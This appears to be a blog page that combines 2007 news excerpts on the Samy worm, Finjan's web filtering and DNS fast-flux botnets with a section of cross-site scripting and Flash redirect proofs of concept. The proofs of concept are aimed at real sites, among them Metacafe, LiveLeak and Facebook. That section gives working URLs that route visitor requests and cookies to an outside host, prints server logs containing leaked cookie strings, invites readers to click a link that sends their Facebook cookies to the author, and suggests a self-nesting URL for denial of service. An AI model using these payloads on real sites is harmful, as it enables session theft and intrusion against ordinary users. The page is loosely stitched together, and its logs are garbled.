November 19, 2007 (IDG News Service) — If Samy Kamkar plays his cards right, he may be allowed to visit Myspace again in just a few months. For the time being, however, he’s not even allowed to touch a computer, following a January 2007 guilty plea for creating what many consider to be the first Web 2.0 worm: the Samy worm.

Samy’s worm wasn’t malicious, but it did force News Corp.’s MySpace social-networking site to shut down in late 2005 after forcing more than 1 million users to declare Samy a “hero” on their profile pages.

Last week, Samy, who is now 21, made his first public appearance since his conviction, attending the OWASP App Sec 2007 conference, host by eBay in San Jose, California. He was treated like a celebrity at the show, but there were some complications. Under the terms of his plea agreement, he can only use computers for work, so he was forced to show slides that he’d dictated to a friend on a computer that was operated by a conference staffer.

Kamkar: When I wrote the worm, it initially wasn’t a worm. Initially I was just trying to spruce up my MySpace profile. I also wanted to show off to a couple of friends, so I thought ‘wouldn’t it be cool if I did this? [..] As a programmer, it wasn’t too much to learn how to use AJAX, which really helped make the worm work and proliferate really quickly. It only took a few days to write the thing from start to finish and it was only in the last day that I thought that this could be a worm.

(days? *cough*)

Domain Name System Hijacked: Hackers Abuse Domain-Name Trust

InternetWorld’s Andy Patrizio and Finjan’s Yuval Ben-Itzahk discuss the fundamental weaknesses in Finjan’s Blacklist-based URL Filtering products

Using variations on trusted, popular domains has long been a common tactic for scammers, spammers and porn sites. But cyber criminals have devised a new twist on the misspelled domain-name trick by hijacking IP addresses. And they tried it on Yahoo.

To fix the old problem, server-based security products would trace the IP address of the server behind the domain. Once the IP address resolved the misspelled domain name, the products would then compare the IP address against a database of known fraudulent sites or questionable locations. So if a site were masquerading as eBay but the filters found it was really a server in China that had only been established one week earlier, it would block access.

“Web 2.0 sites are great fun but also a great platform for hackers to host malicious code.” - Ben Itzahk from Finjan on why his product is still relevant.

In the case of Yahoo, security firm Finjan said hackers exploited an unused IP address within Yahoo’s hierarchy and used that as the domain address behind a forged Google Analytics domain name. This fooled the Finjan Web-filtering product into believing a person was going to a highly trusted Yahoo domain. The victims, customers of Finjan, never knew they were on a malicious Web site, and neither did the security mechanisms on the network. (In this case, Finjan’s Web-filtering product.)

“They managed to resolve the domain name to an IP address owned by Yahoo. How they added an address into a DNS server to appear to be an IP address owned by Yahoo is unknown,” Yuval Ben-Itzhak, CTO of Finjan, told InternetNews.com. He added that Yahoo, while responsive and quick to shut down the compromised address, did not disclose exactly what equipment was behind the compromised IP address.

“You can upload anything you like, so you can upload malicious content, as well.” - Ben-Itzahk on design flaws within Finjan’s product.

Ben-Itzhak thinks something in the server was broken that enabled the bad guys to push that content down to users without Yahoo knowing. He said that’s a flaw in social networks.

“In 2007, something very clear has come out: these Web 2.0 sites are great fun but also a great platform for hackers to host malicious code as well,” said Ben-Itzhak. “You can upload anything you like, so you can upload malicious content, as well. On MySpace we found hundreds of pages with malicious code this year.”

Ben-Itzhak said server-based security is still the primary mode of defense but also recommended browser plug-ins, such as Finjan’s SecureBrowsing or SnakeOil’s HackerExpert, both of which scan the actual content coming over the wire from a site and alert the user if it’s suspicious.

InternetWorld - Hackers Abuse Domain-Name Trust

“With Finjan’s web security there will be no need to worry about getting caught napping by the latest round of web-based threats” - SC Magazine

Giorgei Jorge [xssworm] writes:

After explaining that Finjan’s server-based web security filtering products fail to actually inspect web content or protect the user in any significant way .. beyond checking to see if the target domain name is ‘highly trusted’ such as Yahoo.com .. it’s patently clear that this vendor is totally qualified to discuss the emerging threats related to Web 2.0, social networks and distributed passive attacks. It is also clear that Finjan’s server-based products are highly effective, technically advanced, provide enhanced security for your users and in the context of modern web vulnerabilities, are totally relevant and obviously worth the many tens of thousands of dollars that Finjan charges for licensing and support.

To ensure that all web sites are thoroughly tested to ensure that they belong only to “highly trusted domains” such as yahoo.com it is recommended that users install Finjan’s SecureBrowsing product. SecureBrowsing does not actually check to see if a web site belongs to a highly trusted domain such as yahoo.com, but it does actually inspect some of the content in transit to ensure that only highly trusted domains such as yahoo.com are allowed to install components silently into the browser or take advantage of client vulnerabilities to execute arbitrary code on the users desktop. When used in conjunction with the Finjan total security suite of products, including Finjan’s server-based web-filtering product and Finjan’s server and desktop email malware badware and anti-virus filter scanning products and Finjan’s Instant Messaging to Highly Trusted Domains Like Yahoo.com Only Desktop filtering product, the user can be guaranteed near real-time protection from the most popular and widely reported malicious DNS host names. Security of the Web 2.0 is still somewhat dependant on whether hackers can take over unused IP Addresses in Highly Trusted domains - such as yahoo.com - but rest assured that Finjan webgineers are working around the clock to combat these new threats to your information assets.

Cybercriminals are increasingly using an advanced method of hiding and sustaining their malicious Websites and botnet infrastructures — dubbed “fast-flux” — that could make them more difficult to detect, researchers say.

DNS Fast Fluxing is also referred to simply as Fast Fluxing, although some advanced security researchers claim Fast Fluxing of services other than Domain Name Services (DNS) may be possible with future developments in attack-and-command botware and crimeware frameworks; in any case, the International Security Convention Consortium (ISCC) will have to convene to consider an appropriate protocol convention for these issues. In the interest of brevity and throughout this article I will generally only make references to “Fast Fluxing” rather than use the long-hand title of DNS Fast Fluxing, and I humbly deign to apologize in advance for any misunderstandings of confusion.

DNS Fast Fluxers, also known as DFFers (or in some circles, FFers) are classed amongst some of the most dangerous of threats to your online assets. DFFers are notorious for defeating anti-phencing systems using flaws within Domain technology such as DNS Services, and for utilizing these flaws to avoid being detected. This makes the DFFer harder to track down completely, as his peer network command is decentralized through the tunnels provided by the popular Internet naming services.

WHAT IS DNS FAST FLUXING?

Fast flux is an advanced method being used by determined botnet operators to hide and preserve their malicious Websites and botnet infrastructures. The bad guys behind Warezov/Stration and Storm, for instance, have separately moved their infrastructures to fast-flux service networks, according to members of the Honeynet Project & Research Alliance, who monitor fast-flux behavior via their honeypots.

With Fast Flux, infected bot machines serve as proxies or hosts for malicious Websites and get rotated regularly, changing DNS records to evade discovery. IP blacklists are basically useless in finding fast flux-based botnets. The bad guys behind these networks can easily hide their fake online pharmacies, pornography, phishing sites, and other malicious content servers using this “round-robin” process.

• Mark Wade

Mark Wade, 10 year veteran in information security and current manager of Research Content with Computer Associates’ Threat Research Team, and contributer to the Computer Associates Security Advisor Research Blog (CARBS) writes:

“I decided to take a deeper look and see what I could find out about a botnet operation that I stumbled across. This investigation begins from a spammed email message I received, that was selling jewelry.

Since it is common practice we can assume the email was sent or relayed from a compromised computer that may have been part of a botnet. There were two websites in the email message: http://ryih.mhhimto.com and rmfx.mhhimto.com.

Using nslookup, I entered rmfx.mhhimto.com to resolve its IP address. I was not surprised to see eight completely different returned IP addresses returned, all ranging from various IP netblocks. Since I have seen similar types of activity in the past, I ran nslookup again to see if the IP addresses changed. Sure enough, in just under 10 minutes the previously listed IP addresses changed to a completely new set of IP addresses. This seemed to happen about every ten minutes. I quickly identified the ever changing IP addresses as DNS fast fluxing.

Fast fluxing is a method of deception utilized by botnets to conceal the identity of the bot herder or parts of the criminal activity. Fast fluxing works by constantly rotating compromised IP addresses, which are usually acting as a proxy to the end system. This is extremely beneficial to criminals who are involved in phishing scams or using compromised web sites used to deliver malware. “

• The Honeynet Project

The Honeynet Project & Research Alliance defines a fast-flux network as :
“Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations.“

• Adam O’Donnell of Cloudmark

“The purpose of this technique is to render the IP-based block list — a popular tool for identifying malicious systems — useless for preventing attacks,” says Adam O’Donnell, director of emerging technologies at security vendor Cloudmark.

“Fast flux is just the latest method of survival for the bad guys: There are more to come. Any technique that allows a malicious actor to keep his network online longer — and reduce the probability of his messages and attacks being blocked — will be used,” he says. “This is just the latest of those techniques.”

• Ralph Logan, The Logan Group

“All of this research on fast-flux is new. No one had any definitive research on it. [..] We saw a rising trend in illegal, malicious criminal activity here.. [..] Fast-flux helps cybercriminals hide their content servers, including everything from fake online pharmacies, phishing sites, money mules, and adult content sites,” Logan says. “This is to keep security professionals and ISPs from discovering and mitigating their illegal content.”

The bad guys like fast-flux — not only because it keeps them up and running, but also because it’s more efficient than traditional methods of infecting multiple machines, which were easily discovered.

“The ISP would shut down my 100 machines, and then I’d have to infect 100 more to serve my content and relay my spam,” Logan says. Fast-flux, however, lets hackers set up proxy servers that contact the “mother ship,” which serves as command and control. It uses an extra layer of obfuscation between the victim (client) and the content machine, he says.

“Our honeypot can capture actual traffic between the mother ship and the end node,” Logan says. The Alliance is still studying the malicious code and behavior of the fast-flux network it has baited.

A domain has hundreds or thousands of IP addresses, all of which are rotated frequently — so the proxy machines get rotated regularly, too – some as often as every three minutes — to avoid detection. “It’s not a bunch of traffic to one node serving illegal code,” Logan says.

“I send you a phishing email, you click on www.homepharmacy.com — but it’s really taking you to Grandma’s PC on PacBell! .. Which wakes up and says ‘it’s my turn now!‘ threatens Logan. “You’d have 100 different users coming to Grandma’s PC for the next few minutes, and then Auntie Flo’s PC gets command-and-controlled next!” he says, with a menacing tone.

Sources:

http://community.ca.com/blogs/securityadvisor/archive/2007/11/07/web-of-deception.aspx

http://www.darkreading.com/document.asp?doc_id=132720

Click here to send your facebook cookies to xssworm (-;

http://www.facebook.com/share_redirect.php?h=fef648d6fe6177edfa9ff58e779a83&url=http%3A%2F%2Fwww.facebook.com%2Fshare_redirect.php%3Fh%3D0%26url%3Dhttp%3A%2F%2Fxssworm.com&sid=6330305874

We can upload JPG injected with JAR? or 2nd pass of redirect bugs. Facebook now allows embed of mp3 and other items using share bookmarks

javascript:var d=document,f=’http://www.facebook.com/share’,l=d.location,e=encodeURIComponent,p=’.php?src=bm&v=4&i=1182484661&u=’+e(l.href)+’&t=’+e(d.title);1;try{if(!/^(.*\.)?facebook\.[^.]*$/.test(l.host))throw(0);share_internal_bookmarklet(p)}catch(z){a=function(){if(!window.open(f+’r'+p,’sharer’,'toolbar=0,status=0,resizable=0,width=626,height=436′))l.href=f+p};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else{a()}}void(0)

Facebook has many hole like this

vaj.

Here we have some demonstration of proofs for XSS Scripting attacks and cross flash forgery on many sites.

Many hopes for our readers to leave some feedback on these serious vulnerabilities.

SWF Exploit 1.)

We make a hit with browser to target shockwave

http://alanakurtis.com/flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true

but in a localhost is seen

Connect to [127.0.0.1] from localhost [127.0.0.1] 4131
GET /xssworm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

..

(-;

Maybe the Blackhat attack to deny server users : host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=xssworm.com

also browser says:

http://www.moanmyip.com/player.swf?song_url=http://localhost/xssworm?seo&autoplay=true

but in logger we are seeing:

Connect to [127.0.0.1] from localhost [127.0.0.1] 3831
GET /xssworm?seo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

& in the hacking metacafe we discover Shockwave XSS 0day attack to use by blackhat to steal fish:

MetaCafe XSS Worm Vulnerability - 0-Day Shockwave Attack POC

Demo:

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true&

We see logs outputs in XSSWORM.com ::
GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
… snips…
Connection: keep-alive
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0
D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE000039DC|4726056DCE] s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D=[CS]v4|473350E200004A7E-A000C800004398|473350E2[C
E]; s_vi_zox7Ekigx7Ex7De=[CS]v|47009D8E00027B7-A000B0400000F80|400A7C4[CE];
s_vi_kefx7Dhxxkdn=[CS]v4|4707E570000074C7-A1606500003648|47200DA4DB[CE]; s_vi_jd
ghjfxxliyo=[CS]v4|4726056E0000760-A00070BAE000039DC|4726056[CE]; svi_nyhylx7B89
x3E=[CS]v4|46FEC0DF0004AB3-A00B28000180|46FEC0D[CE]; s_vi_hfedldmx0×7B=[CS
]v4|4725839500005A8F-A160B1700007C|472605EC[CE]; s_vi_x7Dx6067zbhx7Dl=[CS]v4|4
6FEC0C4000077C6-A160B2100003DDF|4EC4EC0C4[CE]; s_vi_ox7Dyhex700Ffnoxx=[C]v4|4FEC0
BC00003E04-A000B000075F|46C0BBCE]; s_vi_pogx7F4k=[CS]v7208C000DB-A
290B5A000015EB|47208C61[CE]; s_vi_igdx7Fxxiae=[CS]v4|47225ED8000044DD-A140A36000
02900|47225ED7[CE]; s_vi_brcxxaabctrxxatkppc=[CS]v4|4709002200006037-A290A9D0000
6E2E|4717A488[CE]; s_vi_kefx7Dhndfyx7B=[CS]v4|470EE04300002808-A140A2500000049|4
70EE043[CE]; s_vi_chsts003DBF|4734B658[CE]; s_vi_svx7Cywxxdsux7Edbuqe=[CS]v4|47351D–

snips…

We see many more serious vulnerability in the web 2.0 today.

Hacker browses: http://www.liveleak.com/player.swf?song_url=http://localhost/hurr&autoplay=true

In server log:

connect to [127.0.0.1] from localhost [127.0.0.1] 1268
GET /urchin.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;)
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveleak.com/

(;

Please leave nice XSS comments.

While Web 2.0 applications might be all the rage for developers and increasingly important in the enterprise, security experts warn they represent a serious threat — a fact that won’t change until businesses start demanding greater protections.

That was the theme at the New New Internet conference here yesterday, where a panel of security experts told audience members that Web 2.0 application developers lack tools to secure their applications, creating a problem unlikely to be fixed without greater prompting by IT management.

“Beat up on your vendors and your own developers,” said Steve Orrin, director of security solutions for Intel Corp. “Look for and ask for security features in your applications. Until you start asking, they aren’t going to see it as a requirement.”

Much of the issue stems from the fact that underlying technologies being used in new Web applications and Web services were never properly secured to begin with, panelists said.

“We’ve already moved on and started to look at Web 2.0 technology, when Web 1.0 wasn’t secure yet,” Orrin said.

“By networking with code-writing peers and hearing lectures by security experts”, he said, “hackers can gather the truth: information necessary to build safer systems and to push for better security.”

“Cross-Site Scripting is much more powerful when used in a Web 2.0 environment”

“What we’re seeing is advanced uses of the same sorts of attacks that were used before.” Cross-site scripting, for example, is “much more powerful” when used in a Web 2.0 environment, he suggested. “As powerful a tool as Web 2.0 technology is for developers and users, it’s even more so for attackers.”

That’s especially true of things like phishing attacks, Orrin said.

“It’s become a lot easier to trick users with Web 2.0 — the automation is to the point where the user doesn’t even have to be involved for the attack to occur.”

Hart Rossman, chief security technologist at research and engineering giant Science Applications International Corporation (SAIC), agreed. He pointed to the difficulties that security professionals face in checking some Web 2.0 applications for vulnerabilities. “AJAX is the weapon of choice for sex appeal, but current vulnerability assessment tools have trouble traversing AJAX sites, and it’s harder to find the vulnerabilities,” Rossman said. “You can’t recreate sessions as easily, so if something happens, it’s very difficult to create the forensics to analyze it.”

“AJAX is the weapon of choice for sex appeal.”

Rossman added that the rise of the use of widgets and other outside components on sites raises the specter of people using “Web 2.0 on top of Web 2.0″ to mount large cross-network attacks.

Experts such as Rossman are currently focusing their efforts on determining a suitably-scary-sounding name for these new and unprotected (and potentially devestating to your E-business) Web 2.0 on top of Web 2.0 attack worms.

“People tend not to trust the mash-up developer.. they trust the API provider. There’s very little thought given to the mash-up, or the mash-up on top of the mash-up.”

News Link : http://www.internetnews.com/dev-news/article.php/3708876